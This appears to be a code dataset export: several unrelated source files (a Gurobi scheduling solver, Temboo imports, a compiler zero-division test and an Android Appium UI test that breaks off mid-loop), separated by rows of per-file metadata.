    def retrieve_solutions(self, parameters_milp: ParametersMilp) -> ResultStorage:
        """Extract the solver's solution pool into a ResultStorage."""
        retrieve_all_solution = parameters_milp.retrieve_all_solution
        nb_solutions_max = parameters_milp.n_solutions_max
        nb_solution = min(nb_solutions_max, self.model.num_solutions)
        if not retrieve_all_solution:
            nb_solution = 1
        list_solution_fits = []
        print(nb_solution, " solutions found")
        for s in range(nb_solution):
            rcpsp_schedule = {}
            modes = {}
            for (task, mode, t) in self.x:
                value = self.x[(task, mode, t)].xi(s)
                if value >= 0.5:
                    rcpsp_schedule[task] = {'start_time': t,
                                            'end_time': t + self.rcpsp_model.mode_details[task][mode]['duration']}
                    modes[task] = mode
            print("Size schedule : ", len(rcpsp_schedule.keys()))
            try:
                # Source (1) and sink (n_jobs+2) tasks are not part of the
                # modes vector expected by RCPSPSolution.
                modes.pop(1)
                modes.pop(self.rcpsp_model.n_jobs + 2)
                modes_vec = [modes[k] for k in sorted(modes)]
                solution = RCPSPSolution(problem=self.rcpsp_model,
                                         rcpsp_schedule=rcpsp_schedule,
                                         rcpsp_modes=modes_vec,
                                         rcpsp_schedule_feasible=True)
                fit = self.aggreg_from_sol(solution)
                list_solution_fits += [(solution, fit)]
            except Exception as e:
                # Best-effort: skip malformed pool entries but surface the
                # failure instead of a silent bare `except`.
                print("Skipping pool solution", s, ":", e)
        return ResultStorage(list_solution_fits=list_solution_fits,
                             best_solution=min(list_solution_fits,
                                               key=lambda x: x[1])[0],
                             mode_optim=self.params_objective_function.sense_function)

    def solve(self, parameters_milp: ParametersMilp = None, **kwargs) -> ResultStorage:
        """Optimize the model (building it first if necessary).

        :param parameters_milp: MILP parameters; ParametersMilp.default() is
            used when None (avoids evaluating the default at def time).
        """
        if parameters_milp is None:
            parameters_milp = ParametersMilp.default()
        if self.model is None:
            self.init_model(greedy_start=False, **kwargs)
        limit_time_s = parameters_milp.TimeLimit
        self.model.sol_pool_size = parameters_milp.PoolSolutions
        self.model.max_mip_gap_abs = parameters_milp.MIPGapAbs
        self.model.max_mip_gap = parameters_milp.MIPGap
        self.model.optimize(max_seconds=limit_time_s,
                            max_solutions=parameters_milp.n_solutions_max)
        return self.retrieve_solutions(parameters_milp)
class LP_MRCPSP_GUROBI(MilpSolver):
    """Multi-mode RCPSP MILP built directly on the gurobi Python API.

    Same formulation as LP_MRCPSP, but using gurobi.Model/addConstrs so the
    solution pool and warm starts go through native Gurobi attributes.
    """

    def __init__(self,
                 rcpsp_model: MultiModeRCPSPModel,
                 lp_solver=LP_RCPSP_Solver.CBC,
                 params_objective_function: ParamsObjectiveFunction = None, **kwargs):
        """
        :param rcpsp_model: multi-mode RCPSP instance to solve.
        :param lp_solver: kept for interface parity with the other solvers;
            this class always uses the gurobi backend.
        :param params_objective_function: objective aggregation setup;
            a default one is built when None.
        """
        self.rcpsp_model = rcpsp_model
        self.model: gurobi.Model = None
        self.lp_solver = CBC
        if lp_solver == LP_RCPSP_Solver.GRB:
            self.lp_solver = GRB
        elif lp_solver == LP_RCPSP_Solver.CBC:
            self.lp_solver = CBC
        self.variable_decision = {}
        self.constraints_dict = {"lns": []}
        self.aggreg_from_sol, self.aggreg_dict, self.params_objective_function = \
            build_aggreg_function_and_params_objective(
                problem=self.rcpsp_model,
                params_objective_function=params_objective_function)

    def init_model(self, **args):
        """Build the gurobi MILP model.

        Keyword args:
            greedy_start (bool): warm-start from a greedy pile solution (default True).
            start_solution (RCPSPSolution): user-supplied warm-start schedule.
            max_horizon (int): override for the scheduling horizon.
            verbose (bool): print progress/debug information (default False).
            partial_solution (PartialSolution): optional constraints fixing
                parts of the schedule.
        """
        greedy_start = args.get("greedy_start", True)
        start_solution = args.get("start_solution", None)
        max_horizon = args.get("max_horizon", None)
        verbose = args.get("verbose", False)
        # Obtain an initial feasible schedule: warm start + horizon bound.
        if start_solution is None:
            if greedy_start:
                if verbose:
                    print("Computing greedy solution")
                # Calendar models need the calendar-aware greedy solver.
                if isinstance(self.rcpsp_model, RCPSPModelCalendar):
                    greedy_solver = PileSolverRCPSP_Calendar(self.rcpsp_model)
                else:
                    greedy_solver = PileSolverRCPSP(self.rcpsp_model)
                store_solution = greedy_solver.solve(greedy_choice=GreedyChoice.MOST_SUCCESSORS)
                self.start_solution = store_solution.get_best_solution_fit()[0]
                makespan = self.rcpsp_model.evaluate(self.start_solution)["makespan"]
            else:
                if verbose:
                    print("Get dummy solution")
                solution = self.rcpsp_model.get_dummy_solution()
                self.start_solution = solution
                makespan = self.rcpsp_model.evaluate(solution)["makespan"]
        else:
            self.start_solution = start_solution
            makespan = self.rcpsp_model.evaluate(start_solution)["makespan"]
        sorted_tasks = sorted(self.rcpsp_model.mode_details.keys())
        # p[j]: worst-case (max over modes) duration, used to size the horizon.
        p = [int(max([self.rcpsp_model.mode_details[key][mode]['duration']
                      for mode in self.rcpsp_model.mode_details[key]]))
             for key in sorted_tasks]
        c = [x for x in self.rcpsp_model.resources.values()]
        renewable = {r: self.rcpsp_model.resources[r] for r in self.rcpsp_model.resources
                     if r not in self.rcpsp_model.non_renewable_resources}
        non_renewable = {r: self.rcpsp_model.resources[r] for r in self.rcpsp_model.non_renewable_resources}
        # S: precedence pairs [predecessor, successor] (task ids, 1-based).
        S = []
        if verbose:
            print('successors: ', self.rcpsp_model.successors)
        for task in sorted_tasks:
            for suc in self.rcpsp_model.successors[task]:
                S.append([task, suc])
        (R, self.J, self.T) = (range(len(c)), range(len(p)), list(range(sum(p))))
        # Tighten the horizon with the warm-start makespan, or the explicit
        # max_horizon override when given.
        if self.start_solution.rcpsp_schedule_feasible:
            self.T = list(range(int(makespan + 1)))
        if max_horizon is not None:
            self.T = list(range(max_horizon + 1))
        if verbose:
            print(self.T)
        self.model = gurobi.Model("MRCPSP")
        # Fix: `Dict[gurobi.Var]` (single type parameter) raises TypeError
        # when the annotation is evaluated; keys are (task, mode, t) tuples.
        self.x: Dict[Tuple[int, int, int], gurobi.Var] = {}
        last_task = max(self.rcpsp_model.mode_details.keys())
        variable_per_task = {}
        # keys_for_t[t]: variables whose task would be running at time t,
        # precomputed so the capacity constraints avoid a full scan of x.
        keys_for_t = {}
        for task in sorted_tasks:
            if task not in variable_per_task:
                variable_per_task[task] = []
            for mode in self.rcpsp_model.mode_details[task]:
                for t in self.T:
                    self.x[(task, mode, t)] = self.model.addVar(name="x({},{}, {})".format(task, mode, t),
                                                                vtype=gurobi.GRB.BINARY)
                    for tt in range(t, t + self.rcpsp_model.mode_details[task][mode]["duration"]):
                        if tt not in keys_for_t:
                            keys_for_t[tt] = set()
                        keys_for_t[tt].add((task, mode, t))
                    variable_per_task[task] += [(task, mode, t)]
        self.model.update()
        # Minimize the start time of the sink task (key[2] is t).
        self.model.setObjective(gurobi.quicksum(self.x[key] * key[2] for key in variable_per_task[last_task]))
        # Each task starts exactly once, in exactly one mode.
        self.model.addConstrs(gurobi.quicksum(self.x[key] for key in variable_per_task[j]) == 1
                              for j in variable_per_task)
        # Calendar models give per-time-step availability; otherwise replicate
        # the constant capacity over the horizon.
        if isinstance(self.rcpsp_model, RCPSPModelCalendar):
            renewable_quantity = {r: renewable[r] for r in renewable}
        else:
            renewable_quantity = {r: [renewable[r]] * len(self.T) for r in renewable}
        if isinstance(self.rcpsp_model, RCPSPModelCalendar):
            non_renewable_quantity = {r: non_renewable[r] for r in non_renewable}
        else:
            non_renewable_quantity = {r: [non_renewable[r]] * len(self.T) for r in non_renewable}
        # Renewable capacity at every time step.
        self.model.addConstrs(gurobi.quicksum(int(self.rcpsp_model.mode_details[key[0]][key[1]][r]) * self.x[key]
                                              for key in keys_for_t[t])
                              <= renewable_quantity[r][t]
                              for (r, t) in product(renewable, self.T))
        # Non-renewable resources are consumed globally, once per task.
        self.model.addConstrs(gurobi.quicksum(int(self.rcpsp_model.mode_details[key[0]][key[1]][r]) * self.x[key]
                                              for key in self.x) <= non_renewable_quantity[r][0]
                              for r in non_renewable)
        self.model.update()
        # durations[j]: mode-dependent effective duration of task j.
        durations = {j: self.model.addVar(name="duration_" + str(j),
                                          vtype=gurobi.GRB.INTEGER)
                     for j in variable_per_task}
        self.durations = durations
        self.variable_per_task = variable_per_task
        self.model.addConstrs(gurobi.quicksum(self.rcpsp_model.mode_details[key[0]][key[1]]["duration"] * self.x[key]
                                              for key in variable_per_task[j]) == durations[j]
                              for j in variable_per_task)
        # Precedence: start(s) - start(j) >= duration(j).
        self.model.addConstrs(gurobi.quicksum([key[2] * self.x[key] for key in variable_per_task[s]]
                                              + [- key[2] * self.x[key]
                                                 for key in variable_per_task[j]]) >=
                              durations[j]
                              for (j, s) in S)
        # Explicit integer start-time variables, linked to x and warm-started.
        start = []
        self.starts = {}
        for task in sorted_tasks:
            self.starts[task] = self.model.addVar(name="start({})".format(task),
                                                  vtype=gurobi.GRB.INTEGER,
                                                  lb=0, ub=self.T[-1])
            self.starts[task].start = self.start_solution.rcpsp_schedule[task]["start_time"]
            self.model.addConstr(gurobi.quicksum([self.x[key] * key[2] for key in variable_per_task[task]])
                                 == self.starts[task])
        # Warm start x via the native Gurobi `.start` attribute (source/sink
        # tasks only have mode 1).
        for j in self.start_solution.rcpsp_schedule:
            start_time_j = self.start_solution.rcpsp_schedule[j]["start_time"]
            mode_j = 1 if j == 1 or j == self.rcpsp_model.n_jobs + 2 else self.start_solution.rcpsp_modes[j - 2]
            start += [(self.durations[j], self.rcpsp_model.mode_details[j][mode_j]["duration"])]
            for k in self.variable_per_task[j]:
                task, mode, time = k
                if start_time_j == time and mode == mode_j:
                    start += [(self.x[k], 1)]
                    self.x[k].start = 1
                else:
                    start += [(self.x[k], 0)]
                    self.x[k].start = 0
        # Optional partial-solution constraints.
        p_s: Union[PartialSolution, None] = args.get("partial_solution", None)
        self.constraints_partial_solutions = []
        self.model.update()
        if p_s is not None:
            constraints = []
            if p_s.start_times is not None:
                # Fix: addConstrs returns a gurobi tupledict; rebinding
                # `constraints` to it broke the later list appends. Extend the
                # list with the constraint objects instead.
                constraints += list(self.model.addConstrs(
                    gurobi.quicksum([self.x[k] for k in self.variable_per_task[task]
                                     if k[2] == p_s.start_times[task]]) == 1
                    for task in p_s.start_times).values())
            if p_s.partial_permutation is not None:
                for t1, t2 in zip(p_s.partial_permutation[:-1], p_s.partial_permutation[1:]):
                    constraints += [self.model.addConstr(gurobi.quicksum([key[2] * self.x[key] for key in variable_per_task[t1]]
                                                                         + [- key[2] * self.x[key]
                                                                            for key in variable_per_task[t2]]) <= 0)]
            if p_s.list_partial_order is not None:
                for l in p_s.list_partial_order:
                    for t1, t2 in zip(l[:-1], l[1:]):
                        constraints += [self.model.addConstr(gurobi.quicksum([key[2] * self.x[key] for key in variable_per_task[t1]]
                                                                             + [- key[2] * self.x[key]
                                                                                for key in variable_per_task[t2]]) <= 0)]
            if p_s.start_at_end is not None:
                for i, j in p_s.start_at_end:
                    constraints += [self.model.addConstr(self.starts[j] == self.starts[i] + durations[i])]
            if p_s.start_together is not None:
                for i, j in p_s.start_together:
                    constraints += [self.model.addConstr(self.starts[j] == self.starts[i])]
            if p_s.start_after_nunit is not None:
                for t1, t2, delta in p_s.start_after_nunit:
                    constraints += [self.model.addConstr(self.starts[t2] >= self.starts[t1] + delta)]
            if p_s.start_at_end_plus_offset is not None:
                for t1, t2, delta in p_s.start_at_end_plus_offset:
                    constraints += [self.model.addConstr(self.starts[t2] >= self.starts[t1] + delta + durations[t1])]
            self.constraints_partial_solutions = constraints
            if verbose:
                print('Partial solution constraints : ', self.constraints_partial_solutions)
            self.model.update()

    def retrieve_solutions(self, parameters_milp: ParametersMilp) -> ResultStorage:
        """Extract Gurobi's solution pool into a ResultStorage."""
        retrieve_all_solution = parameters_milp.retrieve_all_solution
        nb_solutions_max = parameters_milp.n_solutions_max
        nb_solution = min(nb_solutions_max, self.model.SolCount)
        if not retrieve_all_solution:
            nb_solution = 1
        list_solution_fits = []
        for s in range(nb_solution):
            # Select the s-th pool solution; Xn then reads its values.
            self.model.params.SolutionNumber = s
            rcpsp_schedule = {}
            modes = {}
            for (task, mode, t) in self.x:
                value = self.x[(task, mode, t)].getAttr('Xn')
                if value >= 0.5:
                    rcpsp_schedule[task] = {'start_time': t,
                                            'end_time': t + self.rcpsp_model.mode_details[task][mode]['duration']}
                    modes[task] = mode
            print("Size schedule : ", len(rcpsp_schedule.keys()))
            try:
                # Source (1) and sink (n_jobs+2) tasks are not part of the
                # modes vector expected by RCPSPSolution.
                modes.pop(1)
                modes.pop(self.rcpsp_model.n_jobs + 2)
                modes_vec = [modes[k] for k in sorted(modes)]
                solution = RCPSPSolution(problem=self.rcpsp_model,
                                         rcpsp_schedule=rcpsp_schedule,
                                         rcpsp_modes=modes_vec,
                                         rcpsp_schedule_feasible=True)
                fit = self.aggreg_from_sol(solution)
                list_solution_fits += [(solution, fit)]
            except Exception as e:
                # Best-effort: skip malformed pool entries but surface the
                # failure instead of a silent bare `except`.
                print("Skipping pool solution", s, ":", e)
        return ResultStorage(list_solution_fits=list_solution_fits,
                             best_solution=min(list_solution_fits,
                                               key=lambda x: x[1])[0],
                             mode_optim=self.params_objective_function.sense_function)

    def solve(self, parameters_milp: ParametersMilp = None, **kwargs) -> ResultStorage:
        """Optimize the model (building it first if necessary).

        :param parameters_milp: MILP parameters; ParametersMilp.default() is
            used when None (avoids evaluating the default at def time).
        """
        if parameters_milp is None:
            parameters_milp = ParametersMilp.default()
        if self.model is None:
            self.init_model(greedy_start=False, **kwargs)
        self.model.setParam("TimeLimit", parameters_milp.TimeLimit)
        self.model.setParam("MIPGapAbs", parameters_milp.MIPGapAbs)
        self.model.setParam("PoolSolutions", parameters_milp.PoolSolutions)
        self.model.modelSense = gurobi.GRB.MINIMIZE
        self.model.optimize()
        return self.retrieve_solutions(parameters_milp)
| 53.860856
| 139
| 0.548077
| 4,291
| 35,225
| 4.287579
| 0.055232
| 0.047831
| 0.06392
| 0.026416
| 0.906185
| 0.886509
| 0.855908
| 0.823242
| 0.814165
| 0.800087
| 0
| 0.016069
| 0.341008
| 35,225
| 653
| 140
| 53.943338
| 0.776505
| 0.046246
| 0
| 0.758377
| 0
| 0
| 0.025573
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021164
| false
| 0.005291
| 0.022928
| 0
| 0.065256
| 0.037037
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1b3502587afa799940a20dfb06d571e67f4f6f7e
| 551
|
py
|
Python
|
temboo/core/Library/PostgreSQL/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 7
|
2016-03-07T02:07:21.000Z
|
2022-01-21T02:22:41.000Z
|
temboo/core/Library/PostgreSQL/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | null | null | null |
temboo/core/Library/PostgreSQL/__init__.py
|
jordanemedlock/psychtruths
|
52e09033ade9608bd5143129f8a1bfac22d634dd
|
[
"Apache-2.0"
] | 8
|
2016-06-14T06:01:11.000Z
|
2020-04-22T09:21:44.000Z
|
from temboo.Library.PostgreSQL.JSONToDB import JSONToDB, JSONToDBInputSet, JSONToDBResultSet, JSONToDBChoreographyExecution
from temboo.Library.PostgreSQL.ParameterizedQuery import ParameterizedQuery, ParameterizedQueryInputSet, ParameterizedQueryResultSet, ParameterizedQueryChoreographyExecution
from temboo.Library.PostgreSQL.RunCommand import RunCommand, RunCommandInputSet, RunCommandResultSet, RunCommandChoreographyExecution
from temboo.Library.PostgreSQL.XMLToDB import XMLToDB, XMLToDBInputSet, XMLToDBResultSet, XMLToDBChoreographyExecution
| 110.2
| 173
| 0.905626
| 40
| 551
| 12.475
| 0.525
| 0.08016
| 0.136273
| 0.216433
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050817
| 551
| 4
| 174
| 137.75
| 0.954111
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1baafbd2bab8eec64d1e42e8e421919cb2c222f1
| 43
|
py
|
Python
|
tests/errors/test_zero_division4.py
|
akshanshbhatt/lpython
|
70fef49dbbb6cbb0447f7013231171e5c8b8e5df
|
[
"BSD-3-Clause"
] | 31
|
2022-01-07T23:56:33.000Z
|
2022-03-29T16:09:02.000Z
|
tests/errors/test_zero_division4.py
|
akshanshbhatt/lpython
|
70fef49dbbb6cbb0447f7013231171e5c8b8e5df
|
[
"BSD-3-Clause"
] | 197
|
2021-12-29T19:01:41.000Z
|
2022-03-31T15:58:25.000Z
|
tests/errors/test_zero_division4.py
|
akshanshbhatt/lpython
|
70fef49dbbb6cbb0447f7013231171e5c8b8e5df
|
[
"BSD-3-Clause"
] | 17
|
2022-01-06T15:34:36.000Z
|
2022-03-31T13:55:33.000Z
|
def f():
    # Negative test case: intentionally divides by 0.0 so the compiler/test
    # harness can check the zero-division diagnostic (file lives under
    # tests/errors/). Do not "fix" the division.
    # `f64` is presumably the frontend's 64-bit float type — not a CPython
    # builtin; the annotation only needs to be meaningful to that compiler.
    f: f64 = 4.5
    print(f/0.0)
| 10.75
| 16
| 0.418605
| 10
| 43
| 1.8
| 0.7
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.214286
| 0.348837
| 43
| 3
| 17
| 14.333333
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0
| 0
| 0.333333
| 0.333333
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1bd16e4bf1b877db71262f3ac1db829ea5b26135
| 45
|
py
|
Python
|
modules/rulesets/reportingsystems/__init__.py
|
fingerecho/proms-4.0
|
6c3a1fd62c9394761664e100fc1dde50fd79dc11
|
[
"CC-BY-4.0"
] | 2
|
2019-11-23T03:56:28.000Z
|
2019-12-03T15:48:34.000Z
|
modules/rulesets/reportingsystems/__init__.py
|
fingerecho/proms-4.0
|
6c3a1fd62c9394761664e100fc1dde50fd79dc11
|
[
"CC-BY-4.0"
] | null | null | null |
modules/rulesets/reportingsystems/__init__.py
|
fingerecho/proms-4.0
|
6c3a1fd62c9394761664e100fc1dde50fd79dc11
|
[
"CC-BY-4.0"
] | 3
|
2019-04-12T18:09:35.000Z
|
2020-03-14T14:38:45.000Z
|
from .reportingsystems import ReportingSytems
| 45
| 45
| 0.911111
| 4
| 45
| 10.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 45
| 1
| 45
| 45
| 0.97619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
942696cafcbec5e78a18c3f13f710fecff455690
| 14,496
|
py
|
Python
|
tests/PDAtest.py
|
canfeit/wappium
|
d5d288a114180934f2a0f9f057916399a9a8555a
|
[
"MIT"
] | 1
|
2019-09-10T07:30:56.000Z
|
2019-09-10T07:30:56.000Z
|
tests/PDAtest.py
|
canfeit/wappium
|
d5d288a114180934f2a0f9f057916399a9a8555a
|
[
"MIT"
] | 1
|
2021-05-10T13:36:33.000Z
|
2021-05-10T13:36:33.000Z
|
tests/PDAtest.py
|
canfeit/wappium
|
d5d288a114180934f2a0f9f057916399a9a8555a
|
[
"MIT"
] | 1
|
2020-02-16T08:27:41.000Z
|
2020-02-16T08:27:41.000Z
|
#-*- coding: UTF-8 -*-
import os,sys
import unittest
from testwa import webdriver
from testwa.webdriver.common.touch_action import TouchAction
from testwa.webdriver.common.multi_action import MultiAction
from time import sleep
import unicodedata
import random
import subprocess
# Returns abs path relative to this file and not cwd
PATH = lambda p: os.path.abspath(
    os.path.join(os.path.dirname(__file__), p)
)
# Handle to the external automation-server process; managed in setUp/tearDown.
p = None
class TestwaTests(unittest.TestCase):
    def setUp(self):
        """(Re)start the local Testwa automation server and open a fresh
        webdriver session against the PDA app before each test."""
        global wd,screenRatioX,screenRatioY,touchAction,p
        # Kill any server process left over from a previous test run.
        if p:
            p.terminate()
            p.wait()
        # Launch the bundled node-based automation server and give it time to boot.
        p = subprocess.Popen(["C:\\Testwa\\Generator\\TestwaServer\\node.exe", "C:\\Testwa\\Generator\\TestwaServer\\build\\lib\\main.js"])
        sleep(10)
        # Desired capabilities describing the target device and the app under test.
        desired_caps = {}
        desired_caps['platformName'] = 'Android'
        desired_caps['platformVersion'] = '5.1'
        desired_caps['deviceName'] = 'MT66-2WA-8D00375'
        desired_caps['unicodeKeyboard'] = True
        desired_caps['resetKeyboard'] = True
        desired_caps['app'] = PATH('C:/Users/Administrator/Downloads/pda-debug.apk')
        desired_caps['appPackage'] = 'com.chanjet.tpluspda'
        desired_caps['appActivity'] = 'com.chanjet.tpluspda.activity.login.GuideActivity'
        desired_caps['appWaitPackage'] = 'com.chanjet.tpluspda'
        #desired_caps['appWaitActivity'] = 'com.chanjet.tpluspda.activity.login.GuideActivity'
        desired_caps['newCommandTimeout'] = 3600
        desired_caps['noReset'] = True
        global wd,screenRatioX,screenRatioY,touchAction
        self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)
        wd = self.driver
        wd.implicitly_wait(60)
        touchAction = TouchAction(wd)
        #record device width*height
        # Scale factors from the 480x800 reference resolution the script was
        # recorded on to the actual device resolution.
        originScreenWidth = 480.0
        originScreenHeight = 800.0
        windows_size = wd.get_window_size()
        currentWidth = windows_size.get('width')
        currentHeight = windows_size.get('height')
        screenRatioX = currentWidth/originScreenWidth
        screenRatioY = currentHeight/originScreenHeight
    def tearDown(self):
        """Close the webdriver session and stop the automation server."""
        wd.quit()
        global p
        # NOTE(review): this spawns a NEW server process and then immediately
        # terminates it — the pre-existing process bound to `p` is replaced
        # without being stopped. Likely the Popen call is misplaced; confirm
        # the intended cleanup order before relying on this.
        p = subprocess.Popen(["C:\\Testwa\\Generator\\TestwaServer\\node.exe", "C:\\Testwa\\Generator\\TestwaServer\\build\\lib\\main.js"])
        if p:
            p.terminate()
def testTestwa(self):
global wd,screenRatioX,screenRatioY,touchAction,p
reload(sys)
sys.setdefaultencoding( "utf-8" )
#START_TO_RECORD_SCRIPT
while True:
try_time = 10;
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='1']/android.widget.ImageView[@index='0']").click()
#sleep(2)
#wd.find_element_by_xpath("//android.widget.ImageView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.TextView[@index='1']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='3']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.Button[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.ScrollView[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='1']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.ImageView[@index='4']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='3']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.Button[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.TextView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(10)
wd.find_element_by_xpath("//android.widget.ImageView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='1']/android.widget.LinearLayout[@index='0']/android.widget.ImageView[@index='0']").click()
#sleep(2)
#wd.find_element_by_xpath("//android.widget.RelativeLayout[@index='0']/android.widget.ImageView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.LinearLayout[@index='0']/android.widget.CheckBox[@index='1']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.Button[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.Button[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.ImageView[@index='4']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='1']/android.widget.Button[@index='1']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.TextView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(10)
wd.find_element_by_xpath("//android.widget.RelativeLayout[@index='0']/android.widget.ImageView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='2']/android.widget.ImageView[@index='0']").click()
#sleep(2)
#wd.find_element_by_xpath("//android.widget.ImageView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.TextView[@index='1']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.Button[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.ImageView[@index='4']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']/android.widget.LinearLayout[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.Button[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.TextView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(10)
wd.find_element_by_xpath("//android.widget.ImageView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='1']/android.widget.LinearLayout[@index='1']/android.widget.ImageView[@index='0']").click()
#sleep(2)
#wd.find_element_by_xpath("//android.widget.RelativeLayout[@index='0']/android.widget.ImageView[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.LinearLayout[@index='2']/android.widget.LinearLayout[@index='0']/android.widget.CheckBox[@index='1']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.Button[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.Button[@index='0']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
wd.find_element_by_xpath("//android.widget.ImageView[@index='4']").click()
except Exception as e:
try_time = try_time - 1
try:
sleep(2)
